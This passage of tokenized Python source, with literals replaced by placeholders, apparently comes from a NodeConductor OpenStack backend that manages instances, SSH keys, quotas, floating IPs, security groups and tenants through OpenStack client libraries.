verify_ssl , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : True , <EOL> } <EOL> return glance_client . Client ( endpoint , ** kwargs ) <EOL> @ property <EOL> def ceilometer ( self ) : <EOL> catalog = ServiceCatalog . factory ( self . session . auth . auth_ref ) <EOL> endpoint = catalog . url_for ( service_type = '<STR_LIT>' ) <EOL> kwargs = { <EOL> '<STR_LIT>' : lambda : self . session . get_token ( ) , <EOL> '<STR_LIT>' : endpoint , <EOL> '<STR_LIT>' : not self . verify_ssl , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : True , <EOL> } <EOL> return ceilometer_client . Client ( '<STR_LIT:2>' , ** kwargs ) <EOL> class OpenStackBackend ( ServiceBackend ) : <EOL> DEFAULT_TENANT = '<STR_LIT>' <EOL> def __init__ ( self , settings , tenant_id = None ) : <EOL> self . settings = settings <EOL> self . tenant_id = tenant_id <EOL> def get_client ( self , name = None , admin = False ) : <EOL> credentials = { <EOL> '<STR_LIT>' : self . settings . backend_url , <EOL> '<STR_LIT:username>' : self . settings . username , <EOL> '<STR_LIT:password>' : self . settings . password , <EOL> } <EOL> if not admin : <EOL> if not self . tenant_id : <EOL> raise OpenStackBackendError ( <EOL> "<STR_LIT>" ) <EOL> credentials [ '<STR_LIT>' ] = self . tenant_id <EOL> elif self . settings . options : <EOL> credentials [ '<STR_LIT>' ] = self . settings . options . get ( '<STR_LIT>' , self . DEFAULT_TENANT ) <EOL> else : <EOL> credentials [ '<STR_LIT>' ] = self . 
DEFAULT_TENANT <EOL> attr_name = '<STR_LIT>' if admin else '<STR_LIT>' <EOL> client = getattr ( self , attr_name , None ) <EOL> if hasattr ( self , attr_name ) : <EOL> client = getattr ( self , attr_name ) <EOL> else : <EOL> client = OpenStackClient ( ** credentials ) <EOL> setattr ( self , attr_name , client ) <EOL> if name : <EOL> return getattr ( client , name ) <EOL> else : <EOL> return client <EOL> def __getattr__ ( self , name ) : <EOL> clients = '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' <EOL> for client in clients : <EOL> if name == '<STR_LIT>' . format ( client ) : <EOL> return self . get_client ( client , admin = False ) <EOL> if name == '<STR_LIT>' . format ( client ) : <EOL> return self . get_client ( client , admin = True ) <EOL> raise AttributeError ( <EOL> "<STR_LIT>" % ( self . __class__ . __name__ , name ) ) <EOL> def ping ( self , raise_exception = False ) : <EOL> return True <EOL> def ping_resource ( self , instance ) : <EOL> try : <EOL> self . nova_client . servers . get ( instance . backend_id ) <EOL> except ( ConnectionError , nova_exceptions . ClientException ) : <EOL> return False <EOL> else : <EOL> return True <EOL> def sync ( self ) : <EOL> try : <EOL> self . pull_flavors ( ) <EOL> self . pull_images ( ) <EOL> except ( nova_exceptions . ClientException , glance_exceptions . ClientException ) as e : <EOL> logger . exception ( '<STR_LIT>' , self . settings . backend_url ) <EOL> six . reraise ( OpenStackBackendError , e ) <EOL> else : <EOL> logger . info ( '<STR_LIT>' , self . settings . backend_url ) <EOL> def provision ( self , instance , flavor = None , image = None , ssh_key = None , ** kwargs ) : <EOL> if ssh_key : <EOL> instance . key_name = self . get_key_name ( ssh_key ) <EOL> instance . key_fingerprint = ssh_key . fingerprint <EOL> kwargs [ '<STR_LIT>' ] = ssh_key . public_key <EOL> instance . flavor_name = flavor . name <EOL> instance . cores = flavor . cores <EOL> instance . ram = flavor . 
ram <EOL> instance . flavor_disk = flavor . disk <EOL> instance . disk = instance . system_volume_size + instance . data_volume_size <EOL> if image : <EOL> instance . image_name = image . name <EOL> instance . min_disk = image . min_disk <EOL> instance . min_ram = image . min_ram <EOL> instance . save ( ) <EOL> kwargs [ '<STR_LIT>' ] = flavor . backend_id <EOL> if image : <EOL> kwargs [ '<STR_LIT>' ] = image . backend_id <EOL> send_task ( '<STR_LIT>' , '<STR_LIT>' ) ( instance . uuid . hex , ** kwargs ) <EOL> def destroy ( self , instance , force = False ) : <EOL> instance . schedule_deletion ( ) <EOL> instance . save ( ) <EOL> send_task ( '<STR_LIT>' , '<STR_LIT>' ) ( instance . uuid . hex , force = force ) <EOL> def start ( self , instance ) : <EOL> instance . schedule_starting ( ) <EOL> instance . save ( ) <EOL> send_task ( '<STR_LIT>' , '<STR_LIT:start>' ) ( instance . uuid . hex ) <EOL> def stop ( self , instance ) : <EOL> instance . schedule_stopping ( ) <EOL> instance . save ( ) <EOL> send_task ( '<STR_LIT>' , '<STR_LIT>' ) ( instance . uuid . hex ) <EOL> def restart ( self , instance ) : <EOL> instance . schedule_restarting ( ) <EOL> instance . save ( ) <EOL> send_task ( '<STR_LIT>' , '<STR_LIT>' ) ( instance . uuid . hex ) <EOL> def get_key_name ( self , public_key ) : <EOL> safe_name = self . sanitize_key_name ( public_key . name ) <EOL> key_name = '<STR_LIT>' . format ( public_key . uuid . hex , safe_name ) <EOL> return key_name <EOL> def sanitize_key_name ( self , key_name ) : <EOL> return re . sub ( r'<STR_LIT>' , '<STR_LIT:_>' , key_name ) [ : <NUM_LIT> ] <EOL> def add_ssh_key ( self , ssh_key , service_project_link ) : <EOL> if service_project_link . tenant is not None : <EOL> key_name = self . get_key_name ( ssh_key ) <EOL> self . get_or_create_ssh_key_for_tenant ( <EOL> service_project_link . tenant , key_name , ssh_key . fingerprint , ssh_key . 
public_key ) <EOL> def get_or_create_ssh_key_for_tenant ( self , tenant , key_name , fingerprint , public_key ) : <EOL> nova = self . nova_client <EOL> try : <EOL> return nova . keypairs . find ( fingerprint = fingerprint ) <EOL> except nova_exceptions . NotFound : <EOL> try : <EOL> return nova . keypairs . create ( name = key_name , public_key = public_key ) <EOL> except ( nova_exceptions . ClientException , keystone_exceptions . ClientException ) as e : <EOL> six . reraise ( OpenStackBackendError , e ) <EOL> else : <EOL> logger . info ( '<STR_LIT>' , key_name ) <EOL> except ( nova_exceptions . ClientException , keystone_exceptions . ClientException ) as e : <EOL> six . reraise ( OpenStackBackendError , e ) <EOL> else : <EOL> logger . info ( '<STR_LIT>' , key_name ) <EOL> def remove_ssh_key ( self , ssh_key , service_project_link ) : <EOL> if service_project_link . tenant is not None : <EOL> self . remove_ssh_key_from_tenant ( service_project_link . tenant , ssh_key ) <EOL> @ log_backend_action ( ) <EOL> def remove_ssh_key_from_tenant ( self , tenant , key_name , fingerprint ) : <EOL> nova = self . nova_client <EOL> keys = nova . keypairs . findall ( fingerprint = fingerprint ) <EOL> for key in keys : <EOL> if key . name == key_name : <EOL> nova . keypairs . delete ( key ) <EOL> logger . info ( '<STR_LIT>' , key_name ) <EOL> def _get_instance_state ( self , instance ) : <EOL> nova_to_nodeconductor = { <EOL> '<STR_LIT>' : models . Instance . States . ONLINE , <EOL> '<STR_LIT>' : models . Instance . States . PROVISIONING , <EOL> '<STR_LIT>' : models . Instance . States . ERRED , <EOL> '<STR_LIT>' : models . Instance . States . ERRED , <EOL> '<STR_LIT>' : models . Instance . States . STOPPING , <EOL> '<STR_LIT>' : models . Instance . States . STOPPING , <EOL> '<STR_LIT>' : models . Instance . States . STARTING , <EOL> '<STR_LIT>' : models . Instance . States . ONLINE , <EOL> '<STR_LIT>' : models . Instance . States . OFFLINE , <EOL> '<STR_LIT>' : models . Instance . 
States . ONLINE , <EOL> '<STR_LIT>' : models . Instance . States . OFFLINE , <EOL> '<STR_LIT>' : models . Instance . States . STOPPING , <EOL> '<STR_LIT>' : models . Instance . States . OFFLINE , <EOL> '<STR_LIT>' : models . Instance . States . OFFLINE , <EOL> '<STR_LIT>' : models . Instance . States . OFFLINE , <EOL> '<STR_LIT>' : models . Instance . States . OFFLINE , <EOL> } <EOL> return nova_to_nodeconductor . get ( instance . status , models . Instance . States . ERRED ) <EOL> def _get_current_properties ( self , model ) : <EOL> return { p . backend_id : p for p in model . objects . filter ( settings = self . settings ) } <EOL> def _are_rules_equal ( self , backend_rule , nc_rule ) : <EOL> if backend_rule [ '<STR_LIT>' ] != nc_rule . from_port : <EOL> return False <EOL> if backend_rule [ '<STR_LIT>' ] != nc_rule . to_port : <EOL> return False <EOL> if backend_rule [ '<STR_LIT>' ] != nc_rule . protocol : <EOL> return False <EOL> if backend_rule [ '<STR_LIT>' ] . get ( '<STR_LIT>' , '<STR_LIT>' ) != nc_rule . cidr : <EOL> return False <EOL> return True <EOL> def _are_security_groups_equal ( self , backend_security_group , nc_security_group ) : <EOL> if backend_security_group . name != nc_security_group . name : <EOL> return False <EOL> if len ( backend_security_group . rules ) != nc_security_group . rules . count ( ) : <EOL> return False <EOL> for backend_rule , nc_rule in zip ( backend_security_group . rules , nc_security_group . rules . all ( ) ) : <EOL> if not self . 
_are_rules_equal ( backend_rule , nc_rule ) : <EOL> return False <EOL> return True <EOL> def _normalize_security_group_rule ( self , rule ) : <EOL> if rule [ '<STR_LIT>' ] is None : <EOL> rule [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> if '<STR_LIT>' not in rule [ '<STR_LIT>' ] : <EOL> rule [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> return rule <EOL> def _wait_for_instance_status ( self , server_id , nova , complete_status , <EOL> error_status = None , retries = <NUM_LIT> , poll_interval = <NUM_LIT:3> ) : <EOL> return self . _wait_for_object_status ( <EOL> server_id , nova . servers . get , complete_status , error_status , retries , poll_interval ) <EOL> def _wait_for_volume_status ( self , volume_id , cinder , complete_status , <EOL> error_status = None , retries = <NUM_LIT> , poll_interval = <NUM_LIT:3> ) : <EOL> return self . _wait_for_object_status ( <EOL> volume_id , cinder . volumes . get , complete_status , error_status , retries , poll_interval ) <EOL> def _wait_for_snapshot_status ( self , snapshot_id , cinder , complete_status , error_status , retries = <NUM_LIT> , poll_interval = <NUM_LIT:3> ) : <EOL> return self . _wait_for_object_status ( <EOL> snapshot_id , cinder . volume_snapshots . get , complete_status , error_status , retries , poll_interval ) <EOL> def _wait_for_backup_status ( self , backup , cinder , complete_status , error_status , retries = <NUM_LIT> , poll_interval = <NUM_LIT:3> ) : <EOL> return self . _wait_for_object_status ( <EOL> backup , cinder . backups . get , complete_status , error_status , retries , poll_interval ) <EOL> def _wait_for_object_status ( self , obj_id , client_get_method , complete_status , error_status = None , <EOL> retries = <NUM_LIT:30> , poll_interval = <NUM_LIT:3> ) : <EOL> complete_state_predicate = lambda o : o . status == complete_status <EOL> if error_status is not None : <EOL> error_state_predicate = lambda o : o . 
status == error_status <EOL> else : <EOL> error_state_predicate = lambda _ : False <EOL> for _ in range ( retries ) : <EOL> obj = client_get_method ( obj_id ) <EOL> if complete_state_predicate ( obj ) : <EOL> return True <EOL> if error_state_predicate ( obj ) : <EOL> return False <EOL> time . sleep ( poll_interval ) <EOL> else : <EOL> return False <EOL> def _wait_for_volume_deletion ( self , volume_id , cinder , retries = <NUM_LIT> , poll_interval = <NUM_LIT:3> ) : <EOL> try : <EOL> for _ in range ( retries ) : <EOL> cinder . volumes . get ( volume_id ) <EOL> time . sleep ( poll_interval ) <EOL> return False <EOL> except cinder_exceptions . NotFound : <EOL> return True <EOL> def _wait_for_snapshot_deletion ( self , snapshot_id , cinder , retries = <NUM_LIT> , poll_interval = <NUM_LIT:3> ) : <EOL> try : <EOL> for _ in range ( retries ) : <EOL> cinder . volume_snapshots . get ( snapshot_id ) <EOL> time . sleep ( poll_interval ) <EOL> return False <EOL> except ( cinder_exceptions . NotFound , keystone_exceptions . NotFound ) : <EOL> return True <EOL> def _wait_for_instance_deletion ( self , backend_instance_id , retries = <NUM_LIT> , poll_interval = <NUM_LIT:3> ) : <EOL> nova = self . nova_client <EOL> try : <EOL> for _ in range ( retries ) : <EOL> nova . servers . get ( backend_instance_id ) <EOL> time . sleep ( poll_interval ) <EOL> return False <EOL> except nova_exceptions . NotFound : <EOL> return True <EOL> def pull_flavors ( self ) : <EOL> nova = self . nova_admin_client <EOL> with transaction . atomic ( ) : <EOL> cur_flavors = self . _get_current_properties ( models . Flavor ) <EOL> for backend_flavor in nova . flavors . findall ( is_public = True ) : <EOL> cur_flavors . pop ( backend_flavor . id , None ) <EOL> models . Flavor . objects . update_or_create ( <EOL> settings = self . settings , <EOL> backend_id = backend_flavor . id , <EOL> defaults = { <EOL> '<STR_LIT:name>' : backend_flavor . name , <EOL> '<STR_LIT>' : backend_flavor . 
vcpus , <EOL> '<STR_LIT>' : backend_flavor . ram , <EOL> '<STR_LIT>' : self . gb2mb ( backend_flavor . disk ) , <EOL> } ) <EOL> models . Flavor . objects . filter ( backend_id__in = cur_flavors . keys ( ) ) . delete ( ) <EOL> def pull_images ( self ) : <EOL> glance = self . glance_admin_client <EOL> with transaction . atomic ( ) : <EOL> cur_images = self . _get_current_properties ( models . Image ) <EOL> for backend_image in glance . images . list ( ) : <EOL> if backend_image . is_public and not backend_image . deleted : <EOL> cur_images . pop ( backend_image . id , None ) <EOL> models . Image . objects . update_or_create ( <EOL> settings = self . settings , <EOL> backend_id = backend_image . id , <EOL> defaults = { <EOL> '<STR_LIT:name>' : backend_image . name , <EOL> '<STR_LIT>' : backend_image . min_ram , <EOL> '<STR_LIT>' : self . gb2mb ( backend_image . min_disk ) , <EOL> } ) <EOL> models . Image . objects . filter ( backend_id__in = cur_images . keys ( ) ) . delete ( ) <EOL> @ log_backend_action ( '<STR_LIT>' ) <EOL> def push_tenant_quotas ( self , tenant , quotas ) : <EOL> if '<STR_LIT>' in quotas : <EOL> quotas_ratios = django_settings . NODECONDUCTOR . get ( '<STR_LIT>' , { } ) <EOL> volume_ratio = quotas_ratios . get ( '<STR_LIT>' , <NUM_LIT:4> ) <EOL> snapshots_ratio = quotas_ratios . get ( '<STR_LIT>' , <NUM_LIT:20> ) <EOL> quotas [ '<STR_LIT>' ] = volume_ratio * quotas [ '<STR_LIT>' ] <EOL> quotas [ '<STR_LIT>' ] = snapshots_ratio * quotas [ '<STR_LIT>' ] <EOL> cinder_quotas = { <EOL> '<STR_LIT>' : self . mb2gb ( quotas . get ( '<STR_LIT>' ) ) if '<STR_LIT>' in quotas else None , <EOL> '<STR_LIT>' : quotas . get ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : quotas . get ( '<STR_LIT>' ) , <EOL> } <EOL> cinder_quotas = { k : v for k , v in cinder_quotas . items ( ) if v is not None } <EOL> nova_quotas = { <EOL> '<STR_LIT>' : quotas . get ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : quotas . 
get ( '<STR_LIT>' ) , <EOL> } <EOL> nova_quotas = { k : v for k , v in nova_quotas . items ( ) if v is not None } <EOL> neutron_quotas = { <EOL> '<STR_LIT>' : quotas . get ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : quotas . get ( '<STR_LIT>' ) , <EOL> } <EOL> neutron_quotas = { k : v for k , v in neutron_quotas . items ( ) if v is not None } <EOL> try : <EOL> if cinder_quotas : <EOL> self . cinder_client . quotas . update ( tenant . backend_id , ** cinder_quotas ) <EOL> if nova_quotas : <EOL> self . nova_client . quotas . update ( tenant . backend_id , ** nova_quotas ) <EOL> if neutron_quotas : <EOL> self . neutron_client . update_quota ( tenant . backend_id , { '<STR_LIT>' : neutron_quotas } ) <EOL> except Exception as e : <EOL> six . reraise ( OpenStackBackendError , e ) <EOL> @ log_backend_action ( '<STR_LIT>' ) <EOL> def pull_tenant_quotas ( self , tenant ) : <EOL> nova = self . nova_client <EOL> neutron = self . neutron_client <EOL> cinder = self . cinder_client <EOL> service_project_link = tenant . service_project_link <EOL> try : <EOL> nova_quotas = nova . quotas . get ( tenant_id = tenant . backend_id ) <EOL> cinder_quotas = cinder . quotas . get ( tenant_id = tenant . backend_id ) <EOL> neutron_quotas = neutron . show_quota ( tenant_id = tenant . backend_id ) [ '<STR_LIT>' ] <EOL> except ( nova_exceptions . ClientException , <EOL> cinder_exceptions . ClientException , <EOL> neutron_exceptions . NeutronClientException ) as e : <EOL> six . reraise ( OpenStackBackendError , e ) <EOL> service_project_link . set_quota_limit ( '<STR_LIT>' , nova_quotas . ram ) <EOL> service_project_link . set_quota_limit ( '<STR_LIT>' , nova_quotas . cores ) <EOL> service_project_link . set_quota_limit ( '<STR_LIT>' , self . gb2mb ( cinder_quotas . gigabytes ) ) <EOL> service_project_link . set_quota_limit ( '<STR_LIT>' , nova_quotas . instances ) <EOL> service_project_link . set_quota_limit ( '<STR_LIT>' , neutron_quotas [ '<STR_LIT>' ] ) <EOL> service_project_link . 
set_quota_limit ( '<STR_LIT>' , neutron_quotas [ '<STR_LIT>' ] ) <EOL> service_project_link . set_quota_limit ( '<STR_LIT>' , neutron_quotas [ '<STR_LIT>' ] ) <EOL> try : <EOL> volumes = cinder . volumes . list ( ) <EOL> snapshots = cinder . volume_snapshots . list ( ) <EOL> instances = nova . servers . list ( ) <EOL> security_groups = nova . security_groups . list ( ) <EOL> floating_ips = neutron . list_floatingips ( tenant_id = tenant . backend_id ) [ '<STR_LIT>' ] <EOL> flavors = { flavor . id : flavor for flavor in nova . flavors . list ( ) } <EOL> ram , vcpu = <NUM_LIT:0> , <NUM_LIT:0> <EOL> for flavor_id in ( instance . flavor [ '<STR_LIT:id>' ] for instance in instances ) : <EOL> try : <EOL> flavor = flavors . get ( flavor_id , nova . flavors . get ( flavor_id ) ) <EOL> except nova_exceptions . NotFound : <EOL> logger . warning ( '<STR_LIT>' , flavor_id ) <EOL> continue <EOL> ram += getattr ( flavor , '<STR_LIT>' , <NUM_LIT:0> ) <EOL> vcpu += getattr ( flavor , '<STR_LIT>' , <NUM_LIT:0> ) <EOL> except ( nova_exceptions . ClientException , <EOL> cinder_exceptions . ClientException , <EOL> neutron_exceptions . NeutronClientException ) as e : <EOL> six . reraise ( OpenStackBackendError , e ) <EOL> service_project_link . set_quota_usage ( '<STR_LIT>' , ram ) <EOL> service_project_link . set_quota_usage ( '<STR_LIT>' , vcpu ) <EOL> service_project_link . set_quota_usage ( '<STR_LIT>' , sum ( self . gb2mb ( v . size ) for v in volumes + snapshots ) ) <EOL> service_project_link . set_quota_usage ( '<STR_LIT>' , len ( instances ) , fail_silently = True ) <EOL> service_project_link . set_quota_usage ( '<STR_LIT>' , len ( security_groups ) ) <EOL> service_project_link . set_quota_usage ( '<STR_LIT>' , len ( sum ( [ sg . rules for sg in security_groups ] , [ ] ) ) ) <EOL> service_project_link . 
set_quota_usage ( '<STR_LIT>' , len ( floating_ips ) ) <EOL> @ log_backend_action ( '<STR_LIT>' ) <EOL> def pull_tenant_floating_ips ( self , tenant ) : <EOL> service_project_link = tenant . service_project_link <EOL> neutron = self . neutron_client <EOL> try : <EOL> nc_floating_ips = { ip . backend_id : ip for ip in service_project_link . floating_ips . all ( ) } <EOL> try : <EOL> backend_floating_ips = { <EOL> ip [ '<STR_LIT:id>' ] : ip <EOL> for ip in neutron . list_floatingips ( tenant_id = self . tenant_id ) [ '<STR_LIT>' ] <EOL> if ip . get ( '<STR_LIT>' ) and ip . get ( '<STR_LIT:status>' ) <EOL> } <EOL> except neutron_exceptions . NeutronClientException as e : <EOL> six . reraise ( OpenStackBackendError , e ) <EOL> backend_ids = set ( backend_floating_ips . keys ( ) ) <EOL> nc_ids = set ( nc_floating_ips . keys ( ) ) <EOL> with transaction . atomic ( ) : <EOL> for ip_id in nc_ids - backend_ids : <EOL> ip = nc_floating_ips [ ip_id ] <EOL> ip . delete ( ) <EOL> logger . info ( '<STR_LIT>' , ip . uuid ) <EOL> for ip_id in backend_ids - nc_ids : <EOL> ip = backend_floating_ips [ ip_id ] <EOL> created_ip = service_project_link . floating_ips . create ( <EOL> status = ip [ '<STR_LIT:status>' ] , <EOL> backend_id = ip [ '<STR_LIT:id>' ] , <EOL> address = ip [ '<STR_LIT>' ] , <EOL> backend_network_id = ip [ '<STR_LIT>' ] <EOL> ) <EOL> logger . info ( '<STR_LIT>' , created_ip . uuid ) <EOL> for ip_id in nc_ids & backend_ids : <EOL> nc_ip = nc_floating_ips [ ip_id ] <EOL> backend_ip = backend_floating_ips [ ip_id ] <EOL> if nc_ip . status != backend_ip [ '<STR_LIT:status>' ] or nc_ip . address != backend_ip [ '<STR_LIT>' ] or nc_ip . backend_network_id != backend_ip [ '<STR_LIT>' ] : <EOL> if not ( nc_ip . status == '<STR_LIT>' and backend_ip [ '<STR_LIT:status>' ] == '<STR_LIT>' ) : <EOL> nc_ip . status = backend_ip [ '<STR_LIT:status>' ] <EOL> nc_ip . address = backend_ip [ '<STR_LIT>' ] <EOL> nc_ip . backend_network_id = backend_ip [ '<STR_LIT>' ] <EOL> nc_ip . 
save ( ) <EOL> logger . info ( '<STR_LIT>' , nc_ip . uuid ) <EOL> except Exception as e : <EOL> six . reraise ( OpenStackBackendError , e ) <EOL> @ log_backend_action ( '<STR_LIT>' ) <EOL> def pull_tenant_security_groups ( self , tenant ) : <EOL> nova = self . nova_client <EOL> service_project_link = tenant . service_project_link <EOL> try : <EOL> try : <EOL> backend_security_groups = nova . security_groups . list ( ) <EOL> except nova_exceptions . ClientException as e : <EOL> six . reraise ( OpenStackBackendError , e ) <EOL> nonexistent_groups = [ ] <EOL> unsynchronized_groups = [ ] <EOL> extra_groups = service_project_link . security_groups . exclude ( <EOL> backend_id__in = [ g . id for g in backend_security_groups ] , <EOL> ) <EOL> with transaction . atomic ( ) : <EOL> for backend_group in backend_security_groups : <EOL> try : <EOL> nc_group = service_project_link . security_groups . get ( backend_id = backend_group . id ) <EOL> if not self . _are_security_groups_equal ( backend_group , nc_group ) : <EOL> unsynchronized_groups . append ( backend_group ) <EOL> except models . SecurityGroup . DoesNotExist : <EOL> nonexistent_groups . append ( backend_group ) <EOL> extra_groups . delete ( ) <EOL> if extra_groups : <EOL> logger . debug ( '<STR_LIT>' , <EOL> '<STR_LIT>' . join ( '<STR_LIT>' % ( sg . name , sg . pk ) for sg in extra_groups ) ) <EOL> for backend_group in unsynchronized_groups : <EOL> nc_security_group = service_project_link . security_groups . get ( backend_id = backend_group . id ) <EOL> if backend_group . name != nc_security_group . name : <EOL> nc_security_group . name = backend_group . name <EOL> nc_security_group . state = StateMixin . States . OK <EOL> nc_security_group . save ( ) <EOL> self . pull_security_group_rules ( nc_security_group ) <EOL> logger . debug ( '<STR_LIT>' , <EOL> nc_security_group . name , nc_security_group . pk ) <EOL> for backend_group in nonexistent_groups : <EOL> nc_security_group = service_project_link . 
security_groups . create ( <EOL> backend_id = backend_group . id , <EOL> name = backend_group . name , <EOL> state = StateMixin . States . OK <EOL> ) <EOL> self . pull_security_group_rules ( nc_security_group ) <EOL> logger . debug ( '<STR_LIT>' , <EOL> nc_security_group . name , nc_security_group . pk ) <EOL> except Exception as e : <EOL> six . reraise ( OpenStackBackendError , e ) <EOL> def pull_security_group_rules ( self , security_group ) : <EOL> nova = self . nova_client <EOL> backend_security_group = nova . security_groups . get ( group_id = security_group . backend_id ) <EOL> backend_rules = [ <EOL> self . _normalize_security_group_rule ( r ) <EOL> for r in backend_security_group . rules <EOL> ] <EOL> nonexistent_rules = [ ] <EOL> unsynchronized_rules = [ ] <EOL> extra_rules = security_group . rules . exclude ( backend_id__in = [ r [ '<STR_LIT:id>' ] for r in backend_rules ] ) <EOL> with transaction . atomic ( ) : <EOL> for backend_rule in backend_rules : <EOL> try : <EOL> nc_rule = security_group . rules . get ( backend_id = backend_rule [ '<STR_LIT:id>' ] ) <EOL> if not self . _are_rules_equal ( backend_rule , nc_rule ) : <EOL> unsynchronized_rules . append ( backend_rule ) <EOL> except security_group . rules . model . DoesNotExist : <EOL> nonexistent_rules . append ( backend_rule ) <EOL> extra_rules . delete ( ) <EOL> logger . info ( '<STR_LIT>' ) <EOL> for backend_rule in unsynchronized_rules : <EOL> security_group . rules . filter ( backend_id = backend_rule [ '<STR_LIT:id>' ] ) . update ( <EOL> from_port = backend_rule [ '<STR_LIT>' ] , <EOL> to_port = backend_rule [ '<STR_LIT>' ] , <EOL> protocol = backend_rule [ '<STR_LIT>' ] , <EOL> cidr = backend_rule [ '<STR_LIT>' ] [ '<STR_LIT>' ] , <EOL> ) <EOL> logger . debug ( '<STR_LIT>' ) <EOL> for backend_rule in nonexistent_rules : <EOL> rule = security_group . rules . 
create ( <EOL> from_port = backend_rule [ '<STR_LIT>' ] , <EOL> to_port = backend_rule [ '<STR_LIT>' ] , <EOL> protocol = backend_rule [ '<STR_LIT>' ] , <EOL> cidr = backend_rule [ '<STR_LIT>' ] [ '<STR_LIT>' ] , <EOL> backend_id = backend_rule [ '<STR_LIT:id>' ] , <EOL> ) <EOL> logger . info ( '<STR_LIT>' , rule . id ) <EOL> def sync_instance_security_groups ( self , instance ) : <EOL> nova = self . nova_client <EOL> server_id = instance . backend_id <EOL> backend_ids = set ( g . id for g in nova . servers . list_security_group ( server_id ) ) <EOL> nc_ids = set ( <EOL> models . SecurityGroup . objects <EOL> . filter ( instance_groups__instance__backend_id = server_id ) <EOL> . exclude ( backend_id = '<STR_LIT>' ) <EOL> . values_list ( '<STR_LIT>' , flat = True ) <EOL> ) <EOL> for group_id in backend_ids - nc_ids : <EOL> try : <EOL> nova . servers . remove_security_group ( server_id , group_id ) <EOL> except nova_exceptions . ClientException : <EOL> logger . exception ( '<STR_LIT>' , <EOL> group_id , server_id ) <EOL> else : <EOL> logger . info ( '<STR_LIT>' , <EOL> group_id , server_id ) <EOL> for group_id in nc_ids - backend_ids : <EOL> try : <EOL> nova . servers . add_security_group ( server_id , group_id ) <EOL> except nova_exceptions . ClientException : <EOL> logger . exception ( '<STR_LIT>' , <EOL> group_id , server_id ) <EOL> else : <EOL> logger . info ( '<STR_LIT>' , <EOL> group_id , server_id ) <EOL> @ log_backend_action ( ) <EOL> def create_tenant ( self , tenant ) : <EOL> keystone = self . keystone_admin_client <EOL> try : <EOL> backend_tenant = keystone . tenants . create ( tenant_name = tenant . name , description = tenant . description ) <EOL> tenant . backend_id = backend_tenant . id <EOL> tenant . save ( update_fields = [ '<STR_LIT>' ] ) <EOL> except keystone_exceptions . ClientException as e : <EOL> six . reraise ( OpenStackBackendError , e ) <EOL> @ log_backend_action ( ) <EOL> def pull_tenant ( self , tenant ) : <EOL> keystone = self . 
keystone_admin_client <EOL> if not tenant . backend_id : <EOL> raise OpenStackBackendError ( '<STR_LIT>' ) <EOL> try : <EOL> backend_tenant = keystone . tenants . get ( tenant . backend_id ) <EOL> except keystone_exceptions . ClientException as e : <EOL> six . reraise ( OpenStackBackendError , e ) <EOL> else : <EOL> tenant . name = backend_tenant . name <EOL> tenant . description = backend_tenant . description <EOL> tenant . save ( ) <EOL> @ log_backend_action ( ) <EOL> def add_admin_user_to_tenant ( self , tenant ) : <EOL> """<STR_LIT>""" <EOL> keystone = self . keystone_admin_client <EOL> try : <EOL> admin_user = keystone . users . find ( name = self . settings . username ) <EOL> admin_role = keystone . roles . find ( name = '<STR_LIT>' ) <EOL> try : <EOL> keystone . roles . add_user_role ( <EOL> user = admin_user . id , <EOL> role = admin_role . id , <EOL> tenant = tenant . backend_id ) <EOL> except keystone_exceptions . Conflict : <EOL> pass <EOL> except keystone_exceptions . ClientException as e : <EOL> six . reraise ( OpenStackBackendError , e ) <EOL> @ log_backend_action ( '<STR_LIT>' ) <EOL> def create_tenant_user ( self , tenant ) : <EOL> keystone = self . keystone_client <EOL> try : <EOL> user = keystone . users . create ( <EOL> name = tenant . user_username , <EOL> password = tenant . user_password , <EOL> ) <EOL> admin_role = keystone . roles . find ( name = '<STR_LIT>' ) <EOL> keystone . roles . add_user_role ( <EOL> user = user . id , <EOL> role = admin_role . id , <EOL> tenant = tenant . backend_id , <EOL> ) <EOL> except keystone_exceptions . ClientException as e : <EOL> six . reraise ( OpenStackBackendError , e ) <EOL> def get_instance ( self , instance_id ) : <EOL> try : <EOL> nova = self . nova_client <EOL> cinder = self . cinder_client <EOL> instance = nova . servers . get ( instance_id ) <EOL> try : <EOL> attached_volume_ids = [ v . volumeId for v in nova . volumes . 
get_server_volumes ( instance_id ) ] <EOL> if len ( attached_volume_ids ) != <NUM_LIT:2> : <EOL> raise OpenStackBackendError ( '<STR_LIT>' ) <EOL> for volume_id in attached_volume_ids : <EOL> volume = cinder . volumes . get ( volume_id ) <EOL> if volume . bootable == '<STR_LIT:true>' : <EOL> system_volume = volume <EOL> elif volume . bootable == '<STR_LIT:false>' : <EOL> data_volume = volume <EOL> flavor = nova . flavors . get ( instance . flavor [ '<STR_LIT:id>' ] ) <EOL> cores = flavor . vcpus <EOL> ram = flavor . ram <EOL> ips = { } <EOL> for net_conf in instance . addresses . values ( ) : <EOL> for ip in net_conf : <EOL> if ip [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> ips [ '<STR_LIT>' ] = ip [ '<STR_LIT>' ] <EOL> if ip [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> ips [ '<STR_LIT>' ] = ip [ '<STR_LIT>' ] <EOL> except nova_exceptions . ClientException as e : <EOL> logger . exception ( "<STR_LIT>" , instance_id ) <EOL> six . reraise ( OpenStackBackendError , e ) <EOL> try : <EOL> d = dateparse . parse_datetime ( instance . to_dict ( ) [ '<STR_LIT>' ] ) <EOL> except ( KeyError , ValueError ) : <EOL> launch_time = None <EOL> else : <EOL> if timezone . is_naive ( d ) : <EOL> launch_time = timezone . make_aware ( d , timezone . utc ) <EOL> instance . nc_model_data = dict ( <EOL> name = instance . name or instance . id , <EOL> key_name = instance . key_name or '<STR_LIT>' , <EOL> start_time = launch_time , <EOL> state = self . _get_instance_state ( instance ) , <EOL> created = dateparse . parse_datetime ( instance . created ) , <EOL> cores = cores , <EOL> ram = ram , <EOL> disk = self . gb2mb ( system_volume . size + data_volume . size ) , <EOL> system_volume_id = system_volume . id , <EOL> system_volume_size = self . gb2mb ( system_volume . size ) , <EOL> data_volume_id = data_volume . id , <EOL> data_volume_size = self . gb2mb ( data_volume . size ) , <EOL> 